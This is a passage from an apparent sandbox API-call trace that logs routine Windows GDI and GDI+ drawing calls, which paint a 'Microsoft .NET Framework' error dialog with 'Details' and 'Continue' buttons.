(hdc=0xcd0101b7, color=0xd7d7d7) returned 0xd7d7d7 [0058.281] GetNearestColor (hdc=0xcd0101b7, color=0x0) returned 0x0 [0058.281] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.281] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.283] IsAppThemed () returned 0x1 [0058.283] GetThemeAppProperties () returned 0x3 [0058.283] GetThemeAppProperties () returned 0x3 [0058.283] OpenThemeData () returned 0x30002 [0058.283] GdipGetImageWidth (image=0x4efaca8, width=0x3ae0f8) returned 0x0 [0058.283] GdipGetImageHeight (image=0x4efaca8, height=0x3ae0f8) returned 0x0 [0058.284] IsAppThemed () returned 0x1 [0058.284] GetThemeAppProperties () returned 0x3 [0058.284] GetThemeAppProperties () returned 0x3 [0058.284] DrawTextExW (in: hdc=0x7701083a, lpchText="&Details", cchText=8, lprc=0x3adf20, format=0x102415, lpdtp=0x245cbc4 | out: lpchText="&Details", lprc=0x3adf20) returned 13 [0058.286] IsAppThemed () returned 0x1 [0058.286] GetThemeAppProperties () returned 0x3 [0058.286] GetThemeAppProperties () returned 0x3 [0058.286] IsAppThemed () returned 0x1 [0058.286] GetThemeAppProperties () returned 0x3 [0058.286] GetThemeAppProperties () returned 0x3 [0058.286] GetFocus () returned 0x201f4 [0058.288] IsAppThemed () returned 0x1 [0058.288] GetThemeAppProperties () returned 0x3 [0058.288] GetThemeAppProperties () returned 0x3 [0058.288] IsAppThemed () returned 0x1 [0058.288] GetThemeAppProperties () returned 0x3 [0058.288] GetThemeAppProperties () returned 0x3 [0058.288] IsThemePartDefined () returned 0x1 [0058.288] IsAppThemed () returned 0x1 [0058.288] GetThemeAppProperties () returned 0x3 [0058.288] GetThemeAppProperties () returned 0x3 [0058.289] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0058.289] IsAppThemed () returned 0x1 [0058.289] GetThemeAppProperties () returned 0x3 [0058.289] GetThemeAppProperties () returned 0x3 [0058.289] IsAppThemed () returned 0x1 [0058.289] GetThemeAppProperties () returned 0x3 [0058.289] GetThemeAppProperties () returned 0x3 [0058.289] IsThemePartDefined () returned 0x1 [0058.289] GdipCreateRegion (region=0x3adf68) returned 0x0 [0058.289] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.289] GdipCreateMatrix (matrix=0x3adf68) returned 0x0 [0058.289] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efffb0) returned 0x0 [0058.289] GdipIsMatrixIdentity (matrix=0x4efffb0, result=0x3adf80) returned 0x0 [0058.289] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.289] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x6b79c18) returned 0x0 [0058.289] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.289] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.289] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x6b79c18) returned 0x0 [0058.289] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.289] GdipDeleteMatrix (matrix=0x4efffb0) returned 0x0 [0058.289] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adfa8) returned 0x0 [0058.289] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adf98) returned 0x0 [0058.289] GdipGetRegionHRgn (region=0x4efc950, graphics=0x4e4f360, hRgn=0x3adf98) returned 0x0 [0058.290] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.290] GdipGetDC (graphics=0x4e4f360, hdc=0x3adfb0) returned 0x0 [0058.290] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.290] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.290] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.290] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.290] SaveDC (hdc=0xcd0101b7) returned 1 [0058.290] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x4f040871 [0058.290] GetClipRgn (hdc=0xcd0101b7, hrgn=0x4f040871) returned 0 [0058.290] SelectClipRgn (hdc=0xcd0101b7, hrgn=0xdb040827) returned 2 [0058.290] DeleteObject (ho=0x4f040871) returned 1 [0058.290] DeleteObject (ho=0xdb040827) returned 1 [0058.290] OffsetViewportOrgEx (in: hdc=0xcd0101b7, x=0, y=0, lppt=0x245d2a0 | out: lppt=0x245d2a0) returned 1 [0058.290] DrawThemeParentBackground () returned 0x0 [0058.290] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3add24 | out: lpwndpl=0x3add24) returned 1 [0058.291] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adcd0 | out: lpRect=0x3adcd0) returned 1 [0058.291] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.291] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.291] GetSystemMetrics (nIndex=42) returned 0 [0058.291] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb74, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.291] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb74) returned 0x18 [0058.291] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adbd8 | out: lpRect=0x3adbd8) returned 1 [0058.291] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.291] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.291] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.291] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.291] SaveDC (hdc=0xcd0101b7) returned 2 [0058.291] GetNearestColor (hdc=0xcd0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.291] CreateSolidBrush (color=0xf0f0f0) returned 0x1c100257 [0058.291] FillRect (hDC=0xcd0101b7, lprc=0x3ada78, hbr=0x1c100257) returned 1 [0058.291] DeleteObject (ho=0x1c100257) returned 1 [0058.291] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.291] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.291] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.291] GetSystemMetrics (nIndex=42) returned 0 [0058.291] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb14, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.292] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb14) returned 0x18 [0058.292] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adb78 | out: lpRect=0x3adb78) returned 1 [0058.292] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.292] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.292] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.292] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.292] SaveDC (hdc=0xcd0101b7) returned 2 [0058.292] GetNearestColor (hdc=0xcd0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.292] CreateSolidBrush (color=0xf0f0f0) returned 0x1d100257 [0058.292] FillRect (hDC=0xcd0101b7, lprc=0x3ada18, hbr=0x1d100257) returned 1 [0058.292] DeleteObject (ho=0x1d100257) returned 1 [0058.292] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.292] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.292] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.292] GetSystemMetrics (nIndex=42) returned 0 [0058.292] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb14, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.292] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb14) returned 0x18 [0058.292] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.292] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.292] IsAppThemed () returned 0x1 [0058.292] GetThemeAppProperties () returned 0x3 [0058.292] GetThemeAppProperties () returned 0x3 [0058.292] IsAppThemed () returned 0x1 [0058.292] GetThemeAppProperties () returned 0x3 [0058.292] GetThemeAppProperties () returned 0x3 [0058.293] IsThemePartDefined () returned 0x1 [0058.293] GdipCreateRegion (region=0x3adf0c) returned 0x0 [0058.293] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.293] GdipCreateMatrix (matrix=0x3adf0c) returned 0x0 [0058.293] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.293] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3adf24) returned 0x0 [0058.293] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.293] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.293] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.293] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.293] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.293] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adf4c) returned 0x0 [0058.293] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adf3c) returned 0x0 [0058.293] GdipGetRegionHRgn (region=0x4efc950, graphics=0x4e4f360, hRgn=0x3adf3c) returned 0x0 [0058.293] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.293] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf54) returned 0x0 [0058.293] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.293] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.293] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.293] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.293] SaveDC (hdc=0xcd0101b7) returned 1 [0058.293] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xdc040827 [0058.293] GetClipRgn (hdc=0xcd0101b7, hrgn=0xdc040827) returned 0 [0058.293] SelectClipRgn (hdc=0xcd0101b7, hrgn=0x51040871) returned 2 [0058.294] DeleteObject (ho=0xdc040827) returned 1 [0058.294] DeleteObject (ho=0x51040871) returned 1 [0058.294] OffsetViewportOrgEx (in: hdc=0xcd0101b7, x=0, y=0, lppt=0x245dc24 | out: lppt=0x245dc24) returned 1 [0058.294] IsAppThemed () returned 0x1 [0058.294] GetThemeAppProperties () returned 0x3 [0058.294] GetThemeAppProperties () returned 0x3 [0058.294] DrawThemeBackground () returned 0x0 [0058.294] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.294] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.294] GdipCreateRegion (region=0x3adef4) returned 0x0 [0058.294] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.294] GdipCreateMatrix (matrix=0x3adef4) returned 0x0 [0058.294] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efffb0) returned 0x0 [0058.294] GdipIsMatrixIdentity (matrix=0x4efffb0, result=0x3adf0c) returned 0x0 [0058.294] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.295] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x6b79c18) returned 0x0 [0058.295] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.295] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.295] GdipGetMatrixElements (matrix=0x4efffb0, matrixOut=0x6b79c18) returned 0x0 [0058.295] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.295] GdipDeleteMatrix (matrix=0x4efffb0) returned 0x0 [0058.295] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adf34) returned 0x0 [0058.295] GdipIsInfiniteRegion (region=0x4efc950, graphics=0x4e4f360, result=0x3adf24) returned 0x0 [0058.295] GdipGetRegionHRgn (region=0x4efc950, graphics=0x4e4f360, hRgn=0x3adf24) returned 0x0 [0058.295] GdipDeleteRegion (region=0x4efc950) returned 0x0 [0058.295] GdipGetDC (graphics=0x4e4f360, hdc=0x3adf3c) returned 0x0 [0058.295] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.295] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.295] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.295] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.295] SaveDC (hdc=0xcd0101b7) returned 1 [0058.295] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x52040871 [0058.295] GetClipRgn (hdc=0xcd0101b7, hrgn=0x52040871) returned 0 [0058.295] SelectClipRgn (hdc=0xcd0101b7, hrgn=0xdd040827) returned 2 [0058.295] DeleteObject (ho=0x52040871) returned 1 [0058.295] DeleteObject (ho=0xdd040827) returned 1 [0058.296] OffsetViewportOrgEx (in: hdc=0xcd0101b7, x=0, y=0, lppt=0x245def8 | out: lppt=0x245def8) returned 1 [0058.296] IsAppThemed () returned 0x1 [0058.296] GetThemeAppProperties () returned 0x3 [0058.296] GetThemeAppProperties () returned 0x3 [0058.296] GetThemeBackgroundContentRect () returned 0x0 [0058.296] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.296] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.297] GdipCreateRegion (region=0x3ae0cc) returned 0x0 [0058.297] GdipGetClip (graphics=0x4e4f360, region=0x4efc950) returned 0x0 [0058.297] GdipCloneRegion (region=0x4efc950, cloneRegion=0x3ae0e0) returned 0x0 [0058.318] GdipCombineRegionRectI (region=0x4e4f870, rect=0x3ae0c8, combineMode=0x1) returned 0x0 [0058.318] GdipCombineRegionRectI (region=0x4e4f870, rect=0x3ae0c8, combineMode=0x1) returned 0x0 [0058.319] GdipSetClipRegion (graphics=0x4e4f360, region=0x4e4f870, combineMode=0x0) returned 0x0 [0058.319] GdipGetImageWidth (image=0x4efaca8, width=0x3ae0dc) returned 0x0 [0058.319] GdipGetImageHeight (image=0x4efaca8, height=0x3ae0d8) returned 0x0 [0058.319] GdipDrawImageRectI (graphics=0x4e4f360, image=0x4efaca8, x=4, y=4, width=16, height=16) returned 0x0 [0058.319] GdipSetClipRegion (graphics=0x4e4f360, region=0x4efc950, combineMode=0x0) returned 0x0 [0058.319] IsAppThemed () returned 0x1 [0058.319] GetThemeAppProperties () returned 0x3 [0058.319] GetThemeAppProperties () returned 0x3 [0058.319] GdipGetTextRenderingHint (graphics=0x4e4f360, mode=0x3ae06c) returned 0x0 [0058.320] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae058) returned 0x0 [0058.320] GetCurrentObject (hdc=0xcd0101b7, type=0x1) returned 0x1b00017 [0058.320] GetCurrentObject (hdc=0xcd0101b7, type=0x2) returned 0x1900010 [0058.320] GetCurrentObject (hdc=0xcd0101b7, type=0x7) returned 0x3e050241 [0058.320] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.320] SaveDC (hdc=0xcd0101b7) returned 1 [0058.320] GetTextAlign (hdc=0xcd0101b7) returned 0x0 [0058.320] GetTextColor (hdc=0xcd0101b7) returned 0x0 [0058.320] GetCurrentObject (hdc=0xcd0101b7, type=0x6) returned 0x18a002e [0058.320] GetObjectW (in: h=0x18a002e, c=92, pv=0x3add60 | out: pv=0x3add60) returned 92 [0058.320] SelectObject (hdc=0xcd0101b7, h=0x2d0a07c0) returned 0x18a002e [0058.320] GetBkMode (hdc=0xcd0101b7) returned 2 [0058.320] SetBkMode (hdc=0xcd0101b7, mode=1) returned 2 [0058.320] DrawTextExW (in: hdc=0xcd0101b7, lpchText="&Details", cchText=8, lprc=0x3ade34, format=0x102415, lpdtp=0x245e2ac | out: lpchText="&Details", lprc=0x3ade34) returned 13 [0058.320] DrawTextExW (in: hdc=0xcd0101b7, lpchText="&Details", cchText=8, lprc=0x3adfec, format=0x102015, lpdtp=0x245e2ac | out: lpchText="&Details", lprc=0x3adfec) returned 13 [0058.321] RestoreDC (hdc=0xcd0101b7, nSavedDC=-1) returned 1 [0058.321] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.321] GetFocus () returned 0x201f4 [0058.321] IsAppThemed () returned 0x1 [0058.321] GetThemeAppProperties () returned 0x3 [0058.321] GetThemeAppProperties () returned 0x3 [0058.321] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae238) returned 0x0 [0058.321] BitBlt (hdc=0x101084f, x=0, y=0, cx=100, cy=23, hdcSrc=0xcd0101b7, x1=0, y1=0, rop=0xcc0020) returned 1 [0058.321] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcd0101b7) returned 0x0 [0058.321] SelectPalette (hdc=0x101084f, hPal=0x188000b, bForceBkgd=0) returned 0xc0080824 [0058.321] SelectObject (hdc=0xcd0101b7, h=0x185000f) returned 0x3e050241 [0058.321] DeleteDC (hdc=0xcd0101b7) returned 1 [0058.321] GdipDeleteGraphics (graphics=0x4e4f360) returned 0x0 [0058.321] EndPaint (hWnd=0x201f4, lpPaint=0x3ae1dc) returned 1 [0058.321] PeekMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.321] IsWindowUnicode (hWnd=0x201e6) returned 1 [0058.321] GetMessageW (in: lpMsg=0x3ae6fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3ae6fc) returned 1 [0058.321] TranslateMessage (lpMsg=0x3ae6fc) returned 0 [0058.321] DispatchMessageW (lpMsg=0x3ae6fc) returned 0x0 [0058.321] BeginPaint (in: hWnd=0x201e6, lpPaint=0x3ae1e0 | out: lpPaint=0x3ae1e0) returned 0x101084f [0058.321] SelectPalette (hdc=0x101084f, hPal=0xc0080824, bForceBkgd=1) returned 0x188000b [0058.322] CreateCompatibleDC (hdc=0x101084f) returned 0xcf0101b7 [0058.322] SelectObject (hdc=0xcf0101b7, h=0x3e050241) returned 0x185000f [0058.322] GdipCreateFromHDC (hdc=0xcf0101b7, graphics=0x3ae1f8) returned 0x0 [0058.322] GdipTranslateWorldTransform (graphics=0x4e4f360, dx=0x0, dy=0x0, order=0x0) returned 0x0 [0058.322] GdipSetClipRectI (graphics=0x4e4f360, x=0, y=0, width=100, height=23, combineMode=0x0) returned 0x0 [0058.322] GdipCreateMatrix (matrix=0x3ae240) returned 0x0 [0058.322] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4efb2d0) returned 0x0 [0058.322] GdipIsMatrixIdentity (matrix=0x4efb2d0, result=0x3ae258) returned 0x0 [0058.322] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.322] GdipGetMatrixElements (matrix=0x4efb2d0, matrixOut=0x6b79c18) returned 0x0 [0058.322] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.322] GdipDeleteMatrix (matrix=0x4efb2d0) returned 0x0 [0058.322] GdipCreateRegion (region=0x3ae240) returned 0x0 [0058.322] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.322] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3ae24c) returned 0x0 [0058.322] GdipSaveGraphics (graphics=0x4e4f360, state=0x3ae278) returned 0x0 [0058.322] GdipRestoreGraphics (graphics=0x4e4f360, state=0xfdae0dbd) returned 0x0 [0058.322] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.322] GdipGetDC (graphics=0x4e4f360, hdc=0x3ae058) returned 0x0 [0058.322] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.322] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.322] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.323] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.323] SaveDC (hdc=0xcf0101b7) returned 1 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0x696969) returned 0x696969 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xa0a0a0) returned 0xa0a0a0 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0x0) returned 0x0 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xffffff) returned 0xffffff [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xe5e5e5) returned 0xe5e5e5 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0xd7d7d7) returned 0xd7d7d7 [0058.323] GetNearestColor (hdc=0xcf0101b7, color=0x0) returned 0x0 [0058.323] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.323] GdipReleaseDC (graphics=0x4e4f360, hdc=0xcf0101b7) returned 0x0 [0058.323] IsAppThemed () returned 0x1 [0058.323] GetThemeAppProperties () returned 0x3 [0058.323] GetThemeAppProperties () returned 0x3 [0058.324] SystemParametersInfoW (in: uiAction=0x100a, uiParam=0x0, pvParam=0x3ae0c0, fWinIni=0x0 | out: pvParam=0x3ae0c0) returned 1 [0058.324] SendMessageW (hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.324] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] DrawTextExW (in: hdc=0x7701083a, lpchText="&Continue", cchText=9, lprc=0x3adf14, format=0x102415, lpdtp=0x245eaa4 | out: lpchText="&Continue", lprc=0x3adf14) returned 13 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsThemePartDefined () returned 0x1 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsThemeBackgroundPartiallyTransparent () returned 0x1 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsAppThemed () returned 0x1 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] GetThemeAppProperties () returned 0x3 [0058.324] IsThemePartDefined () returned 0x1 [0058.324] GdipCreateRegion (region=0x3adf5c) returned 0x0 [0058.324] GdipGetClip (graphics=0x4e4f360, region=0x51e9c18) returned 0x0 [0058.324] GdipCreateMatrix (matrix=0x3adf5c) returned 0x0 [0058.325] GdipGetWorldTransform (graphics=0x4e4f360, matrix=0x4e4eff0) returned 0x0 [0058.325] GdipIsMatrixIdentity (matrix=0x4e4eff0, result=0x3adf74) returned 0x0 [0058.325] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.325] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.325] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.325] LocalAlloc (uFlags=0x0, uBytes=0x30) returned 0x6b79c18 [0058.325] GdipGetMatrixElements (matrix=0x4e4eff0, matrixOut=0x6b79c18) returned 0x0 [0058.325] LocalFree (hMem=0x6b79c18) returned 0x0 [0058.325] GdipDeleteMatrix (matrix=0x4e4eff0) returned 0x0 [0058.325] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf9c) returned 0x0 [0058.325] GdipIsInfiniteRegion (region=0x51e9c18, graphics=0x4e4f360, result=0x3adf8c) returned 0x0 [0058.325] GdipGetRegionHRgn (region=0x51e9c18, graphics=0x4e4f360, hRgn=0x3adf8c) returned 0x0 [0058.325] GdipDeleteRegion (region=0x51e9c18) returned 0x0 [0058.325] GdipGetDC (graphics=0x4e4f360, hdc=0x3adfa4) returned 0x0 [0058.325] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.325] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.325] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.325] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.325] SaveDC (hdc=0xcf0101b7) returned 1 [0058.325] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xde040827 [0058.325] GetClipRgn (hdc=0xcf0101b7, hrgn=0xde040827) returned 0 [0058.325] SelectClipRgn (hdc=0xcf0101b7, hrgn=0x56040871) returned 2 [0058.325] DeleteObject (ho=0xde040827) returned 1 [0058.326] DeleteObject (ho=0x56040871) returned 1 [0058.326] OffsetViewportOrgEx (in: hdc=0xcf0101b7, x=0, y=0, lppt=0x245f154 | out: lppt=0x245f154) returned 1 [0058.326] DrawThemeParentBackground () returned 0x0 [0058.326] GetWindowPlacement (in: hWnd=0x201ca, lpwndpl=0x3add18 | out: lpwndpl=0x3add18) returned 1 [0058.326] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adcc4 | out: lpRect=0x3adcc4) returned 1 [0058.326] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.326] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.326] GetSystemMetrics (nIndex=42) returned 0 [0058.326] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb68, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.326] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb68) returned 0x18 [0058.326] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adbcc | out: lpRect=0x3adbcc) returned 1 [0058.326] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.326] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.326] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.326] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.326] SaveDC (hdc=0xcf0101b7) returned 2 [0058.326] GetNearestColor (hdc=0xcf0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.326] CreateSolidBrush (color=0xf0f0f0) returned 0x1e100257 [0058.326] FillRect (hDC=0xcf0101b7, lprc=0x3ada6c, hbr=0x1e100257) returned 1 [0058.326] DeleteObject (ho=0x1e100257) returned 1 [0058.326] RestoreDC (hdc=0xcf0101b7, nSavedDC=-1) returned 1 [0058.326] GetWindowTextLengthW (hWnd=0x201ca) returned 24 [0058.326] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x18 [0058.327] GetSystemMetrics (nIndex=42) returned 0 [0058.327] GetWindowTextW (in: hWnd=0x201ca, lpString=0x3adb08, nMaxCount=25 | out: lpString="Microsoft .NET Framework") returned 24 [0058.327] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201ca, Msg=0xd, wParam=0x19, lParam=0x3adb08) returned 0x18 [0058.327] GetClientRect (in: hWnd=0x201ca, lpRect=0x3adb6c | out: lpRect=0x3adb6c) returned 1 [0058.327] GetCurrentObject (hdc=0xcf0101b7, type=0x1) returned 0x1b00017 [0058.327] GetCurrentObject (hdc=0xcf0101b7, type=0x2) returned 0x1900010 [0058.327] GetCurrentObject (hdc=0xcf0101b7, type=0x7) returned 0x3e050241 [0058.327] GetCurrentObject (hdc=0xcf0101b7, type=0x6) returned 0x18a002e [0058.327] SaveDC (hdc=0xcf0101b7) returned 2 [0058.327] GetNearestColor (hdc=0xcf0101b7, color=0xf0f0f0) returned 0xf0f0f0 [0058.327] CreateSolidBrush (color=0xf0f0f0) returned 0x1f100257 [0058.327] FillRect (hDC=0xcf0101b7, lprc=0x3ada0c, hbr=0x1f100257) returned 1 [0058.327] DeleteObject (ho=0x1f100257) returned 1 [0058.327] RestoreDC (hdc=0xcf0101b7, 